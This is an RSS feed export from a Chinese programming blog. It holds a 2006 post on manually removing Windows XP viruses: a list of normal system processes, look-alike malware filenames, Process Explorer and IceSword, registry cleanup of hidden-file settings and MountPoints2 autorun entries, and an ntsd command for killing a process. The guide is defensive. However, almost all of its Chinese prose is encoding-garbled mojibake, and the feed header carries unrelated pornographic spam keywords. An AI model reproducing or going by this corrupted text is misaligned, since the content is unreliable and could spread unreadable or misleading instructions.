锘??xml version="1.0" encoding="utf-8" standalone="yes"?>99视频日韩,国产精品国产三级国产a,欧美日韩在线不卡一区http://m.shnenglu.com/asp/category/2612.htmlSee, I'm living...zh-cnTue, 20 May 2008 16:56:49 GMTTue, 20 May 2008 16:56:49 GMT60鐣ヨ皥鎵嬪姩鏉姣?/title><link>http://m.shnenglu.com/asp/archive/2006/11/26/15679.html</link><dc:creator>Asp</dc:creator><author>Asp</author><pubDate>Sun, 26 Nov 2006 10:57:00 GMT</pubDate><guid>http://m.shnenglu.com/asp/archive/2006/11/26/15679.html</guid><wfw:comment>http://m.shnenglu.com/asp/comments/15679.html</wfw:comment><comments>http://m.shnenglu.com/asp/archive/2006/11/26/15679.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://m.shnenglu.com/asp/comments/commentRss/15679.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/asp/services/trackbacks/15679.html</trackback:ping><description><![CDATA[ <p> <font size="2">聽(tīng)聽(tīng)聽(tīng) 鏂囩珷鏈夌偣闀匡紝璇瘋繘鏉ョ湅鈥︹?br />聽(tīng)聽(tīng)聽(tīng) 浠ヤ笅鐨勮娉曞叏閮ㄦ槸寤虹珛鍦╓indows XP鐨勫熀紜涓婄殑銆?br />聽(tīng)聽(tīng)聽(tīng) 浼間箮鐜板湪寰堝浜虹殑鐢?shù)鑴戦兘鏌撲簡(jiǎn)鐥呮瘨锛屽緢鎯ㄥQ屾垜涔熸槸鐢?shù)鑴憺畯鑿滃Q屼篃琚梾姣掓姌紓ㄨ繃涓孌墊椂鏃ワ紝鎵浠ュ啓涓嬭繖綃囨枃绔狅紝甯屾湜瀵歸偅浜涜繕鍦ㄨ涓浜涗綆綰х梾姣掓姌紓ㄧ殑浜烘湁鐐瑰府鍔╋紝鍛靛懙鈥︹?br />聽(tīng)聽(tīng)聽(tīng) PS錛氬洜涓烘垜鐜板湪涔熷彧鑳芥潃鏉浣庣駭鐥呮瘨鍝︹︹?br />聽(tīng)聽(tīng)聽(tīng) 鎴戜滑閮界煡閬擄紝涓涓▼搴忚榪愯灝卞繀欏昏杞藉叆鍐呭瓨錛岃岃澆鍏ュ唴瀛樺悗錛岃繖涓▼搴忓氨鎴愪負(fù)浜?jiǎn)涓涓繘紼嬨傛墍璋撶殑緋葷粺榪涚▼錛屼笉榪囧氨鏄搷浣滅郴緇熻繍琛岄渶瑕佽澆鍏ョ殑紼嬪簭鑰屽凡錛岃岀梾姣掕榪愯涔熶竴鏍鳳紝浠栦滑涔熶竴鏍蜂細(xì)琚澆鍏ュ唴瀛橈紝鎴愪負(fù)榪涚▼錛屾墍浠ワ紝鍙鎴戜滑璁よ瘑濂戒簡(jiǎn)榪涚▼錛屼篃灝卞叿澶囦簡(jiǎn)鎵嬪姩鏉姣掔殑鍩烘湰鐭ヨ瘑鈥︹?br />聽(tīng)聽(tīng)聽(tīng) 棣栧厛錛屾寜Ctrl+Alt+Del鎵撳紑浠誨姟綆$悊鍣紝鐐歸夎繘紼嬶紝鍦ㄥ簳涓嬬殑鍒楄〃閲岄潰灝卞垪鍑轟簡(jiǎn)鍗佸嚑涓垨鑰呯敋鑷沖嚑鍗佷釜榪涚▼錛屼綘浼?xì)鍙戠庮C竴浜涘緢鐔熸?zhèn)夌殑鍚嶅瓧锛屾瘮濡俰explore.exe錛圛nternet Explorer鐨勮繘紼嬪悕錛夈乪Mule.exe錛圗Mule鐨勮繘紼嬪悕錛夈丵Q.exe錛圦Q鐨勮繘紼嬪悕錛夛紝鎵浠ユ垜浠ぇ姒傚彲浠ョ寽鍒頒竴鑸潵璇磋繘紼嬪悕鍜岀▼搴忓悕鏄竴鏍風(fēng)殑錛屼絾鏄篃鏈変緥澶栥?br />聽(tīng)聽(tīng)聽(tīng) 閭d箞瑕佸浼?xì)鎵嬫潃錛屽氨蹇呴』鍏堣璇嗚繖浜?788鐨勮繘紼嬪悕錛岀壒鍒槸緋葷粺榪涚▼錛屼笉鐒跺氨浼?xì)鍑虹庮C竴浜涘濂囨殑闂鈥︹﹀懙鍛碘︹?br />聽(tīng)聽(tīng)聽(tīng) 浠ヤ笅鏄垜鏆傛椂鎯寵搗鏉ョ殑涓閮ㄤ喚甯歌鐨勭郴緇熻繘紼嬶紝褰撶劧瀹為檯涓婄郴緇熻繘紼嬬殑鏁伴噺瑕佸寰楀錛屼笉璁よ瘑鐨勫彲浠ュ幓緗戜笂鏌ヤ竴涓嬶紝鎴栬呭幓Baidu鐨勭煡閬撻噷闈㈤棶涓涓嬩篃鍙互錛?br />聽(tīng)聽(tīng)聽(tīng) alg.exe聽(tīng)Windows緗戠粶榪炴帴鍏變韓鍜岀綉緇滆繛鎺ラ槻鐏<br />聽(tīng)聽(tīng)聽(tīng) cmd.exe聽(tīng)鍛戒護(hù)琛?br />聽(tīng)聽(tīng)聽(tīng) conime.exe聽(tīng)杈撳叆娉曠紪杈戝櫒鐩稿叧紼嬪簭<br />聽(tīng)聽(tīng)聽(tīng) csrss.exe聽(tīng)瀛愮郴緇熸湇鍔″櫒榪涚▼<br />聽(tīng)聽(tīng)聽(tīng) ctfmon.exe聽(tīng)Microsoft Office鐨勮璦鏍?br />聽(tīng)聽(tīng)聽(tīng) explorer.exe聽(tīng)璧勬簮綆$悊鍣?br />聽(tīng)聽(tīng)聽(tīng) internat.exe聽(tīng)鎵樼洏鍖虹殑鎷奸煶鍥炬爣錛堟敞鎰忥細(xì)涓嶆槸internet錛屾槸internat錛?br />聽(tīng)聽(tīng)聽(tīng) llssrv.exe聽(tīng)璇佷功璁板綍鏈嶅姟<br />聽(tīng)聽(tīng)聽(tīng) lsass.exe聽(tīng)綆$悊IP 瀹夊叏絳栫暐浠ュ強(qiáng)鍚姩IKE鍜孖P 瀹夊叏椹卞姩紼嬪簭<br />聽(tīng)聽(tīng)聽(tīng) mstask.exe聽(tīng)璁″垝浠誨姟<br />聽(tīng)聽(tīng)聽(tīng) nvsvc32.exe聽(tīng)NVIDIA鏄劇ず鍗$浉鍏崇▼搴?br />聽(tīng)聽(tīng)聽(tīng) point32.exe聽(tīng)寰蔣鐨勯紶鏍囬┍鍔?br />聽(tīng)聽(tīng)聽(tīng) regsvc.exe聽(tīng)榪滅▼娉ㄥ唽琛ㄦ搷浣滐紝寮鍚郴緇熸湇鍔emoteregister榪愯鐨?br />聽(tīng)聽(tīng)聽(tīng) services.exe聽(tīng)鍖呭惈寰堝緋葷粺鏈嶅姟<br />聽(tīng)聽(tīng)聽(tīng) smss.exe聽(tīng)session manager浼?xì)璇澖帯鐞嗗?br />聽(tīng)聽(tīng)聽(tīng) spoolsv.exe聽(tīng)鎵撳嵃緙撳啿姹?br />聽(tīng)聽(tīng)聽(tīng) svchost.exe聽(tīng)windows 2000/xp 鐨勬枃浠朵繚鎶ょ郴緇?br />聽(tīng)聽(tīng)聽(tīng) system聽(tīng)Windows System Process<br />聽(tīng)聽(tīng)聽(tīng) system idle process聽(tīng)鐢ㄤ簬鏄劇ずCPU鍙敤璧勬簮鐧懼垎姣旀儏鍐點(diǎn)?br />聽(tīng)聽(tīng)聽(tīng) tftpd.exe聽(tīng)瀹炵幇tftp internet鏍囧噯銆傝鏍囧噯涓嶈姹傜敤鎴峰悕鍜屽瘑鐮併?br />聽(tīng)聽(tīng)聽(tīng) taskmgr.exe聽(tīng)浠誨姟綆$悊鍣?br />聽(tīng)聽(tīng)聽(tīng) userinit.exe聽(tīng)聽(tīng)綆$悊涓嶅悓鐨勫惎鍔ㄩ『搴忥紝杞藉叆瀹岀敤鎴峰悗灝遍鍑?guó)櫩愯浜?jiǎn)<br />聽(tīng)聽(tīng)聽(tīng) wdfmgr.exe聽(tīng)涓涓郴緇熸湇鍔indows user mode driver framework 錛屾槸瀹夎Windows media player 10娣誨姞鐨勶紝鐢ㄤ簬鍑忓皯鍏煎鎬ч棶棰樸?br />聽(tīng)聽(tīng)聽(tīng) winlogon.exe聽(tīng)綆$悊鐢ㄦ埛鐧誨綍<br />聽(tīng)聽(tīng)聽(tīng) wmiexe.exe聽(tīng)Windows Management Instrumentation錛學(xué)indows綆$悊紼嬪簭<br />聽(tīng)聽(tīng)聽(tīng) wmiprvse.exe聽(tīng)Windows鐨勪竴閮ㄤ喚錛岄氳繃WinMgmt.exe紼嬪簭澶勭悊WMI鎿嶄綔<br />聽(tīng)聽(tīng)聽(tīng) wuauclt.exe聽(tīng)Windows鑷姩鍗囩駭綆$悊紼嬪簭<br />聽(tīng)聽(tīng)聽(tīng) 鏈夌偣鏅曪紵姝e父錛屼絾鏄鐪嬬湅灝變範(fàn)鎯簡(jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 鎺ョ潃錛岃鎴戜滑鏉ユ兂鎯崇梾姣掔殑涔?fàn)鎬э紝杞藉叆鍐呭瓨錛屽鍒跺拰浼鑷繁錛屾劅鏌撴枃浠訛紝騫朵笖鏈変竴瀹氱殑鑷垜淇濇姢鐨勮兘鍔涳紝鑳藉湪涓瀹氭儏鍐典笅澶嶅彂銆傛墍浠ユ墜鏉鐥呮瘨鐨勬濈淮搴旇鏄厛緇撴潫鎺夌梾姣掔殑榪涚▼錛屽啀鎵懼嚭騫跺垹闄や笌鐥呮瘨鐩稿叧鐨勬枃浠訛紝鍐嶅垹闄ゅ拰鐥呮瘨鐩稿叧鐨勫惎鍔ㄩ」鍜屾湇鍔★紝濡傛灉鍒犱笉鎺夛紝鍒欓噸鍚埌瀹夊叏妯″紡錛岀敋鑷矰OS涓嬶紙鏁呴殰鎺у埗鍙幫級(jí)錛屽垹闄ゃ?br />瀵逛簡(jiǎn)錛屼粙緇嶅嚑涓伐鍏鳳細(xì)<br />聽(tīng)聽(tīng)聽(tīng) 涓涓槸榪涚▼鍒嗘瀽宸ュ叿ProcXP錛圥rocess Explorer錛夛紝瀹冪殑榪涚▼綆$悊鍗佸垎鐨勫簳灞傦紝涓轟簡(jiǎn)嫻嬭瘯浠栫殑鑳藉姏錛屼綘鍙互榪愯浠栵紝緇撴潫system鐪嬬湅錛岀粨鏋滃氨鏄綘鐨勬満瀛愰噸鍚簡(jiǎn)錛屽洜涓轟粬鎶奧indows閮界粨鏉熸帀浜?jiǎn)锛屽懙鍛碘︹?br />聽(tīng)聽(tīng)聽(tīng) </font> <a href="/Files/asp/ProcessExplorer.rar"> <font size="2">http://m.shnenglu.com/Files/asp/ProcessExplorer.rar</font> </a> <br /> <font size="2">聽(tīng)聽(tīng)聽(tīng) 絎簩涓伐鍏峰氨鏄枃浠跺叧鑱旀仮澶嶅櫒錛屽洜涓虹幇鍦ㄥ緢澶氱殑鐥呮瘨閮藉拰搴旂敤紼嬪簭鎸備笂浜?jiǎn)閽╁Q屾墍浠ユ潃姣掔殑鏃跺欒繖涓伐鍏鋒槸鍗佸垎鏈夋晥鐨勩?br />聽(tīng)聽(tīng)聽(tīng) </font> <a href="/Files/asp/recover.rar"> <font size="2">http://m.shnenglu.com/Files/asp/recover.rar</font> </a> <br /> <font size="2">聽(tīng)聽(tīng)聽(tīng) 絎笁涓伐鍏鋒槸IceSword錛岃繖涓伐鍏峰嚑涔庡彲浠ヨ瀵熺郴緇熶腑鎵鏈夌殑鎯呭喌錛屽茍涓旇兘澶熷垹闄や竴浜涚壒鍒〗鍥虹殑鏂囦歡錛岃繕鍙互緇撴潫榪涚▼錛屼笉榪囦釜浜哄仛浜?jiǎn)璇曢獙锛屽彂鐜板畠缁撴潫绋嬪簭鐨勬潈闄愬ソ鍍忔病鏈塒rocXP楂樸?br />聽(tīng)聽(tīng)聽(tīng) </font> <a href="/Files/asp/icesword_cn.rar"> <font size="2">http://m.shnenglu.com/Files/asp/icesword_cn.rar</font> </a> <br /> <font size="2">聽(tīng)聽(tīng)聽(tīng) 鎺ヤ笅鏉ワ紝鎴戜滑灝辮寮濮嬪涔?fàn)鎬庝箞媯(gè)鏌ュ拰鍒犻櫎鐥呮瘨浜?jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 棣栧厛錛岀湅浣犵殑鐢?shù)鑴戞湁娌℃湁寮傛狓P紝姣斿寮鏈哄氨鏄竴涓猼emp1鎵ц闈炴硶鎿嶄綔浠涔堢殑錛涢熷害濂囨參鏃犳瘮錛涙彃涓婂埆浜虹殑U鐩橈紝鍒漢U鐩橀噷闈㈠氨澶氫簡(jiǎn)鍑犱釜鏂囦歡絳夌瓑錛屾湁灝辮鏄庯紝浣犱腑褰╀簡(jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 榪愯鏂囦歡鍏寵仈鎭㈠鍣紝鎶娾滀嬌娉ㄥ唽琛ㄧ紪杈戝櫒鍙敤鈥濋変笂錛岀偣寮濮嬩慨澶嶏紝鐒跺悗鍏蟲(chóng)帀瀹冦?br />聽(tīng)聽(tīng)聽(tīng) 鎵撳紑ProcXP錛岀涓嬈℃墦寮鐨勬椂鍊欎細(xì)鏈夋彁紺烘錛岄塝es灝監(jiān)K錛屾帴涓嬫潵錛屼綘浼?xì)鐪嬭浠栫殑鐣岄潰锛屽涓嬪Q?br /><img src="http://m.shnenglu.com/images/cppblog_com/asp/2860/r_KillVirus1.jpg" /><br />聽(tīng)聽(tīng)聽(tīng) 閲岄潰鏈夊嚑鏍忥細(xì)<br />聽(tīng)聽(tīng)聽(tīng) 絎竴鏍廝rocess錛岃繘紼嬪悕鍜屽叾鐖跺瓙鍏崇郴銆?br />聽(tīng)聽(tīng)聽(tīng) 絎簩鏍廝ID錛屽氨鏄繘紼嬪湪緋葷粺涓殑鐗瑰畾鐨処D鈥斺擯rocess ID銆?br />聽(tīng)聽(tīng)聽(tīng) 絎笁鏍廋PU錛孋PU鍗犵敤鐜?br />聽(tīng)聽(tīng)聽(tīng) 絎洓鏍廌escription錛屽紼嬪簭鐨勬弿榪般?br />聽(tīng)聽(tīng)聽(tīng) 絎簲鏍廋ompany Name錛屽巶瀹跺悕銆?br />聽(tīng)聽(tīng)聽(tīng) 鍙﹀鎶婇紶鏍囧仠鍦ㄤ竴涓繘紼嬩笂涓浼?xì)鍎垮Q屾垨鑰呭湪涓婇潰鐐瑰彸閿紝鐐筽roperties錛屽氨鍙互鏄劇ず鍑?guó)櫩欎釜杩浗E嬪搴旂殑紼嬪簭鏄粈涔堝拰榪欎釜紼嬪簭鍔犺澆浜?jiǎn)浠涔堛?br />聽(tīng)聽(tīng)聽(tīng) 鐒跺悗灝辨槸鐪嬩綘鐨勭粡楠屼簡(jiǎn)錛屾壘鍑洪偅浜涘緢濂囨殑榪涚▼鍚э紝鏆傛椂鎴戠敤鐨勫垽瀹氭柟娉曟湁錛?br />聽(tīng)聽(tīng)聽(tīng) 1銆伮?tīng)缁忛獙锛岃寰楃梾姣掋傦紙鍛靛懙錛岀瓑浜庢病鏈夎錛?br />聽(tīng)聽(tīng)聽(tīng) 2銆伮?tīng)涓浜涗吉瑁呰嚜宸辯殑榪涚▼鎴栬呮枃浠跺悕錛歊undl132.exe銆丷undll.exe錛堜吉瑁匯undll32.exe錛夈乻cchost.exe銆乻cvhost.exe銆乻vchost..exe銆乻vchost32.exe銆乻vch0st.exe錛堜吉瑁卻vchost.exe錛夌瓑絳夈?br />聽(tīng)聽(tīng)聽(tīng) 3銆伮?tīng)涓浜涘拰緋葷粺榪涚▼鍚嶅瓧涓鏍鳳紝浣嗘槸璺緞涓嶄竴鏍風(fēng)殑錛屾瘮濡俢:\windows\svchost.exe錛岃岀郴緇熸枃浠剁殑璺緞鏄細(xì)c:\windows\system32\svchost.exe絳夈?br />聽(tīng)聽(tīng)聽(tīng) 4銆伮?tīng)涓浜涚湅鐫鍚嶅瓧灝變笉欏虹溂鐨勶細(xì)sex.exe絳夈?br />聽(tīng)聽(tīng)聽(tīng) 5銆伮?tīng)涓浜涘緢濂囩壒鐨勫悕瀛楋細(xì)123.exe銆乼emp1.exe銆乼emp2.exe銆乻xs.exe銆乹wer.exe銆乤sdf.exe銆乺un.dll絳夌瓑銆?br />聽(tīng)聽(tīng)聽(tīng) 6銆伮?tīng)涓浜涘悕瀛楀拰鎻忚堪涓嶇鍚堢殑榪涚▼錛屾瘮濡俁undll32.exe鎻忚堪鍙樻垚浜?jiǎn)MS Rundll錛岃屼笉鏄疪un a Dll as an App銆?br />聽(tīng)聽(tīng)聽(tīng) 7銆伮?tīng)鐢≧undll鎵撳紑鐨勭▼搴忥紝涓鑸潵璇翠笉鏄祦姘撹蔣浠訛紝灝辨槸鏈ㄩ┈錛屽懙鍛碉紝鏆傛椂緇欐垜鐨勬劅瑙夊氨鏄繖鏍鳳紝褰撶劧涔熸湁渚嬪銆傝繖灝辮鑷繁鍘籔rocXP閲岀殑Properties閲岄潰鐪嬩簡(jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 8銆伮?tīng)涓浜涗細(xì)鍔ㄤ笉鍔ㄥ氨浼?xì)鑷繁澶嶅埗鎴愬嚑涓殑杩浗E嬶紝濡俿tup.exe銆?br />聽(tīng)聽(tīng)聽(tīng) 9銆伮?tīng)鏈笉搴旇瀛樺湪鐨剺q涚▼錛岀幇鍦ㄥ瓨鍦ㄤ簡(jiǎn)錛屾瘮濡傝涓浜涢潪緋葷粺榪涚▼錛屽父瑙佷簬涓浜涙祦姘撹蔣浠訛紝姣斿錛歛ssisstant.exe錛?721錛夛紝YLive.exe錛堥泤铏庡姪鎵嬶級(jí)<br />聽(tīng)聽(tīng)聽(tīng) 紜畾濂界洰鏍囦箣鍚庡氨瑕佸紑濮嬫壘鐥呮瘨鏂囦歡浜?jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 浠繪剰鎵撳紑涓涓枃浠跺す錛岀偣閫夊伐鍏鳳紝鏂囦歡澶歸夐」錛屾煡鐪嬨傛妸涓嬮潰鍒楄〃閲岀殑闅愯棌鍙椾繚鎶ょ殑緋葷粺鏂囦歡錛堟帹鑽愶級(jí)鍜岄殣钘忓凡鐭ユ枃浠剁被鍨嬬殑鎵╁睍鍚嶅墠闈㈢殑鍕劇偣鎺夛紝鍐嶉変笂鏄劇ず鎵鏈夋枃浠跺拰鏂囦歡澶癸紝榪欐牱鐥呮瘨灝辨棤澶勮棌韜簡(jiǎn)銆備絾鏄湁鏃跺欒繖縐嶆柟娉曚細(xì)鏃犳晥錛岄殣钘忕殑鏂囦歡鐓ф牱闅愯棌錛屾瘮濡俁ose鐥呮瘨鐨勪竴涓彉縐嶃傝В鍐蟲(chóng)柟娉曟槸寮濮?銆夎繍琛?銆塺egedit錛屾墦寮娉ㄥ唽琛ㄧ紪杈戝櫒錛屽埌涓婚敭錛堝嵆閲岄潰鍍忔枃浠跺す鐨勪笢瑗匡級(jí)HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/explorer / Advanced/Folder/Hidden/SHOWALL涓嬮潰錛屾妸鍙寵竟鍒楄〃閲岄潰鐨凜heckedValue鍒犻櫎錛屾病鏈夌殑璇濅篃濂斤紝鐒跺悗鏂板緩涓涓狣WORD鍊鹼紝騫惰瀹氳鍊間負(fù)1錛屽啀鍒版枃浠跺す閫夐」閲岄潰錛屽氨鍙互鏀逛簡(jiǎn)銆?br />濂界殑錛岀幇鍦ㄦ樉紺轟簡(jiǎn)鎵鏈夌殑鏂囦歡錛岀梾姣掑湪鍝噷錛烶rocXP閲岄潰涓嶆槸鏈夊啓紼嬪簭鐨勪綅緗悧錛岃涓嬬梾姣掔殑浣嶇疆錛岀粨鏉熺梾姣掔殑榪涚▼錛屽幓鍚э紝浣嗘槸娉ㄦ剰錛岃繖閲屾湁鍑犱釜娉ㄦ剰浜嬮」錛?br />聽(tīng)聽(tīng)聽(tīng) 絎竴錛岃繘鍏ョ鐩樺拰鏂囦歡澶圭殑鏃跺欎笉瑕佺洿鎺ュ弻鍑伙紝鑰岃鐐瑰彸閿紝閫夋墦寮錛屼笉鐒剁殑璇濊嚜鍔ㄦ挱鏀句細(xì)鎶婇儴鍒嗙梾姣掑張嬋媧葷殑銆?br />聽(tīng)聽(tīng)聽(tīng) 絎簩錛屽鏋滄槸c:\windows\system32\rundll32.exe鐨勮瘽錛岄偅鎵劇殑鏂囦歡搴旇鏄痳undll32.exe鍚庨潰鐨勫姞杞介」錛宺undll32.exe鏄棤杈滅殑銆?br />鎵懼埌鐥呮瘨鏂囦歡鍚庯紝鍒犲惂錛屽悗緙鍚嶄負(fù).exe鐨勬枃浠朵竴鑸氨鍒犱簡(jiǎn)錛屼絾鏄鏋滄槸鍚庣紑鍚嶄負(fù).dll鐨勬枃浠訛紝鏈夋椂榪樻槸鍒犱笉鎺夌殑錛屾庝箞鍔烇紵<br />聽(tīng)聽(tīng)聽(tīng) 鎵撳紑ProcXP錛岀偣鑿滃崟鏍忛噷鐨凢ind錛岄塅ind Dlls錛岃緭鍏ヤ綘瑕佸垹鐨刣ll鍚嶏紝鐐筍earch錛屽鏋滆繖涓枃浠惰搴曚笅璋冪敤錛屽氨浼?xì)鏄窘C哄湪搴曚笅鐨勫垪琛ㄦ涓紝鍐嶄竴涓釜鐨勬壘榪欏嚑涓猟ll鎵鍦ㄧ殑榪涚▼錛屾妸榪欏嚑涓繘紼嬬粨鏉熸帀錛屽氨鍙互鍒犻櫎浜?jiǎn)銆?br />鍒犻櫎浜?jiǎn)鐥呮瘨浣撳Q屾垜浠繕瑕佸仛涓鐐規(guī)畫(huà)浣欏伐浣溿?br />聽(tīng)聽(tīng)聽(tīng) 鍐嶆榪愯鏂囦歡鍏寵仈鎭㈠鍣紝鎶娾滀嬌娉ㄥ唽琛ㄧ紪杈戝櫒鍙敤鈥濋変笂錛岀偣寮濮嬩慨澶嶏紝鐒跺悗鍏蟲(chóng)帀瀹冨惂錛屽畠宸茬粡娌℃湁鍒╃敤浠峰間簡(jiǎn)錛屽懙鍛碉紙濂芥畫(huà)蹇嶅摝錛夈?br />聽(tīng)聽(tīng)聽(tīng) 姣斿錛岀梾姣掑鍒剁殑紓佺洏鐨勮嚜鍔ㄦ挱鏀撅紝鏈钁楀悕鐨勫rose鐥呮瘨鐨勪竴涓彉縐嶏紝鍦ㄦ瘡涓洏?shù)笅闈㈤兘浼?xì)寤虹珛鏂囦歡錛宑opy.exe銆乭ost.exe鍜宎utorun.ini錛屽綋鐒跺垽瀹氱殑渚濇嵁鏄痑utorun.ini閲岄潰鐨勫唴瀹癸紝閲岄潰搴旇鏈塧utorun=錛岃繖涓悗闈㈢殑鍐呭灝辨槸鐥呮瘨鐨勪綅緗紝鎵懼埌騫跺垹鎺夊惂錛屽拰autorun.ini涓璧峰垹鎺変箣鍚庯紝浣犱細(xì)鍙戠幇鑷姩鎾斁榪樺湪閭i噷錛屽茍娌℃湁鍒犻櫎錛岃繖鏄洜涓哄湪娉ㄥ唽琛ㄩ噷闈㈣繕鏈夋畫(huà)浣欑殑鍘熷洜錛岃繕璁板緱autorun=鍚庨潰鐨勫唴瀹瑰悧錛熻繍琛宺egedit錛岃繘鍏ユ敞鍐岃〃錛岃繘鍏ヤ富閿細(xì)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2錛屽湪閲岄潰鎼滅儲(chǔ)autorun=鍚庨潰鐨勫唴瀹癸紝鍗砪opy.exe錛屾妸鎵懼埌鐨勯」鎵瀵瑰簲鐨勫湪HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2涓嬬殑涓婚敭鏁翠釜鍒犳帀錛屽嵆鍙傛敞鎰忓彲鑳芥湁寰堝涓紝鍏ㄩ儴瑕佸垹鍝︺傚垹瀹屼箣鍚庯紝鑷姩鎾斁灝辨病鏈変簡(jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 鍙﹀錛岃繕鏈夌梾姣掔殑鍚姩欏癸紝榪愯msconfig錛岄夊惎鍔紝鍦ㄥ垪琛ㄦ閲岄潰鍙堝緢澶氱殑鍚姩欏癸紝鐪嬬湅鍛戒護(hù)鏍忛噷闈㈡湁娌℃湁鐥呮瘨鏂囦歡鐨勮礬寰勶紝鏈夌殑灝卞叏閮ㄥ嬀鎺夛紝紜畾銆?br />聽(tīng)聽(tīng)聽(tīng) 鍦ㄥ彸閿偣鎴戠殑鐢?shù)鑴戝Q岄夌鐞嗐傜偣鏈嶅姟鍜屽簲鐢ㄧ▼搴忥紝鐐規(guī)湇鍔★紝鍦ㄥ彸杈圭殑鍒楄〃閲岄潰涓涓竴涓‘瀹氭湁娌℃湁鏈嶅姟璋冪敤鐥呮瘨錛屾湁灝辯鐢ㄦ帀銆傦紙浠涔堬紵鐪嬩笉鎳傦紵閭e氨鐐瑰彸閿紝灞炴э紝榪涘幓鐪嬫拻鈥︹︼級(jí)<br />聽(tīng)聽(tīng)聽(tīng) 濡傛灉涓婇潰鐨勬柟娉曚笉琛岀殑璇濓紝灝卞幓瀹夊叏妯″紡搴曚笅鐢ㄥ惂錛岄偅浜涘伐鍏峰湪瀹夊叏妯″紡涓嬩篃鍙互鐢ㄧ殑銆?br />聽(tīng)聽(tīng)聽(tīng) OK錛岃繖鏍鳳紝涓鑸殑鐥呮瘨涔熷氨鍩烘湰涓婃悶瀹氫簡(jiǎn)銆?D鈥︹?br />聽(tīng)聽(tīng)聽(tīng) 瀵逛簡(jiǎn)錛屼笂闈㈢殑鏂規(guī)硶鍙兘淇濊瘉鐥呮瘨鏃犳硶榪愯錛屼絾涓嶄竴瀹氳兘瀹屾暣鍦板垹闄ょ梾姣掞紝鍥犱負(fù)榪欑鏂規(guī)硶鏄熀鏈氱敤鐨勬柟娉曪紝涓嶆槸閽堝鍚勪釜鐥呮瘨鐨勭壒娉曪紝鎵浠ヨ澶у瑙佽皡鍝︺?br />聽(tīng)聽(tīng)聽(tīng) 鍙﹀涓婇潰鐨勬柟娉曞彧鑳界敤浜庝竴鑸瘮杈冭壇鎬х殑鐥呮瘨錛屽鏋滅梾姣掓瘮杈冩伓鍔o紝姣斿鎰熸煋exe鏂囦歡錛岃屼笉鏄湪鏂囦歡鍏寵仈涓婄粦瀹氾紝閭e氨娌℃湁鍔炴硶鎵嬫潃錛屾垜璇寸殑涓嶆槸娌℃湁鍔炴硶鐢ㄨ繖涓柟娉曟墜鏉錛岃屾槸娌℃湁鍔炴硶鎵嬫潃銆傚洜涓轟綘瑕佷竴涓竴涓簲鐢ㄧ▼搴忕殑鍘繪妸鐥呮瘨鍒犳帀錛岃鏀圭▼搴忕殑鍏ュ彛鐐癸紝榪欎細(xì)瀵艱嚧浣犲彲鑳借鎵嬪姩淇敼鍑犲崈涓枃浠訛紝鍋囪涓涓枃浠朵綘2鍒嗛挓灝辨悶瀹氫簡(jiǎn)錛岃屼綘涓鍏辮淇敼1000涓枃浠訛紝浣犱篃瑕?3.33涓皬鏃舵墠鑳芥悶瀹氾紝涓嶈繃濡傛灉浣犳湁鍏磋叮錛屽彲浠ュ幓鐮旂┒涓涓媁indows PE鏂囦歡鐨勭粨鏋勫拰鍒嗙鏂囦歡鐨勫師鐞嗭紝浣犱細(xì)浜?jiǎn)瑙e緢澶氱殑浜嬫儏锛屾瘮濡備皋Z粈涔堟潃姣掕蔣浠朵細(xì)鍦ㄦ潃姣掔殑鏃跺欐妸涓浜涘簲鐢ㄧ▼搴忓垹鐑傦紝鍔犲3鍜岃劚澹崇殑鍘熺悊錛孊indFile鐨勫師鐞嗚繕鏈夐偅縐嶄笉澧炲姞鏂囦歡澶у皬鐨凢ileBind鐨勫師鐞嗙瓑絳夈?br />聽(tīng)聽(tīng)聽(tīng) 濂藉惂錛岃浜?jiǎn)鏄暐璋堝Q岀粨鏋滆浜?jiǎn)杩欎箞澶氬Q岃寰楀緢嫻咃紝浣嗘効澶у浼?xì)鍠湅脾锛岒q朵笖鍏卞悓榪涙銆?/font> </p> <p> <font size="2">PS錛?br />聽(tīng)聽(tīng)聽(tīng) 濡傛灉娌℃湁ProcXP鐨勮瘽錛屽彲浠ヤ嬌鐢ㄤ笅闈㈢殑鏂規(guī)硶錛屽叿浣撲嬌鐢紝鑷繁鐮旂┒涓涓嬪惂錛屾垜灝變笉璇翠簡(jiǎn)銆?br />聽(tīng)聽(tīng)聽(tīng) 浠ヤ笅鏄漿Baidu鐭ラ亾鐨勫唴瀹癸細(xì)<br />聽(tīng)聽(tīng)聽(tīng) 鎵撳紑璧勬簮綆$悊鍣紝鎵懼埌鎺у埗闈㈡澘鈫掔鐞嗗伐鍏封啋鏈嶅姟錛屾垨璁鎬綘鑳芥壘鍒頒綘鎯寵KILL鐨勮繘紼嬨?<br />聽(tīng)聽(tīng)聽(tīng) 闄や簡(jiǎn)閲囩敤PROCXP涔嬬被宸ュ叿澶栵紝涔熷彲鐢╓indows 2000浠ヤ笂鑷甫鍑犱釜宸ュ叿銆?<br />聽(tīng)聽(tīng)聽(tīng) ntsd -c q -p PID <br />聽(tīng)聽(tīng)聽(tīng) 